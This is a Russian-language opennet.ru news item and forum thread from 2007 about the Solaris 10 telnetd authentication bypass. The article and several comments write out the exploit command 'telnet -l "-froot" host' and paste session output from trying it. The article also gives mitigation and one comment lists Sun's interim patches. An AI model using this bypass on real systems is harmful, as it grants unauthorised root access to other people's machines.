https://www.opennet.ru/openforum/vsluhforumID3/36695.html В стандартном telnet сервисе (in.telnetd) Solaris 10 обнаружена (http://secunia.com/advisories/24120/) уязвимость позволяющая без лишних усилий получить доступ к системе путем комбинации -l и -f опций. <br><br><br>Например, для входа на удаленную систему без пароля под пользователем root достаточно набрать: telnet -l "-froot" host. Суть в передаче аргумента опции "-l" программе login без проверки, login в свою очередь интерпретирует "-f" - как вход без запроса пароля.<br><br><br>Исправление проблемы еще не анонсировано Sun Microsystems, поэтому крайне рекомендуется отключить in.telnetd сервис или заблокировать пакетным фильтром 23 tcp порт.<br><br><br>Примечательно, что в 1994 году идентичная проблема <br>была найдена (http://osvdb.org/displayvuln.php?osvdb_id=1007) в сервисе rlogin операционной системы AIX.<br><br>URL: http://blogs.securiteam.com/index.php/archives/814<br>Новость: http://www.opennet.ru/opennews/art.shtml?num=9842<br> https://www.opennet.ru/openforum/vsluhforumID3/36695.html#31 Sat, 17 Feb 2007 16:36:14 GMT что-то у меня работает только на десятке, и то не под рутом, на девятке - нет.<br><br>&gt;Мда.... нехило <br>&gt;[root@main:/] #telnet -l"falk" 10.0.0.2 <br>&gt;Trying 10.0.0.2... <br>&gt;Connected to 10.0.0.2. <br>&gt;Escape character is '^]'. <br>&gt;<br>&gt;SunOS 5.10 <br>&gt;<br>&gt;Sourcing //.profile-EIS..... <br>&gt;alk@cnr1 # uname -a <br>&gt;SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210 <br><br><br> https://www.opennet.ru/openforum/vsluhforumID3/36695.html#30 Wed, 14 Feb 2007 19:13:54 GMT А Соляра другой, простите, ни одного дня не была.<br><br>Вот уже с 95-го на моей памяти все дыры в ней были строго ГОМЕРИЧЕСКОГО масштаба.<br><br>Отродясь это было визиткой Соляры. https://www.opennet.ru/openforum/vsluhforumID3/36695.html#29 Wed, 14 Feb 2007 18:45:31 GMT Сколько себя помню, а начинал с FreeBSD 4.x, ни разу не пользовался телнетом... В голову просто не приходило, SSH хватает. https://www.opennet.ru/openforum/vsluhforumID3/36695.html#28 Wed, 14 Feb 2007 11:49:27 GMT Мда.... нехило<br>[root@main:/] #telnet -l"falk" 10.0.0.2<br>Trying 10.0.0.2...<br>Connected to 10.0.0.2.<br>Escape character is '^]'.<br><br>SunOS 5.10<br><br>Sourcing //.profile-EIS.....<br>alk@cnr1 # uname -a<br>SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210<br><br><br><br> https://www.opennet.ru/openforum/vsluhforumID3/36695.html#27 Wed, 14 Feb 2007 09:15:35 GMT ISR (Interim Security Relief) patches are now available for the Solaris 10<br>in.telnetd vulnerability from http://sunsolve.sun.com/tpatches<br><br> The Descriptions and readme links are currently empty, but they should be there<br>shortly.<br><br> The ISR's are :<br><br>IDR125456-01.zip - Solaris 10 SPARC<br>IDR125457-01.zip - Solaris 10 x86<br><br>Patch 120068-01 (SPARC) or 120069-01 (x86) are required patches, however none of<br>these patches/ISR's require a reboot and they will take effect immediately. https://www.opennet.ru/openforum/vsluhforumID3/36695.html#26 Wed, 14 Feb 2007 08:56:42 GMT telnet -l "-froot" 10.0.0.2 https://www.opennet.ru/openforum/vsluhforumID3/36695.html#25 Wed, 14 Feb 2007 08:10:04 GMT что то я не понимаю ... у меня такой номер не прошел<br>[root@main:/] #telnet -l"froot" 10.0.0.2<br>Trying 10.0.0.2...<br>Connected to 10.0.0.2.<br>Escape character is '^]'.<br><br><br>SunOS 5.10<br><br>Password:<br> https://www.opennet.ru/openforum/vsluhforumID3/36695.html#24 Wed, 14 Feb 2007 04:51:24 GMT Да лан, что никто не помнит дыру в том же телнете под четвертой фряхой ? https://www.opennet.ru/openforum/vsluhforumID3/36695.html#23 Tue, 13 Feb 2007 21:09:34 GMT &gt;Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим <br>&gt;telnet, на рутера и сервера - ssh only. <br>Напоминает виндузевый подход - если с фаерволом, антивирусом и браузер не IE использовать то даже вроде и не очень дырявая система получается :)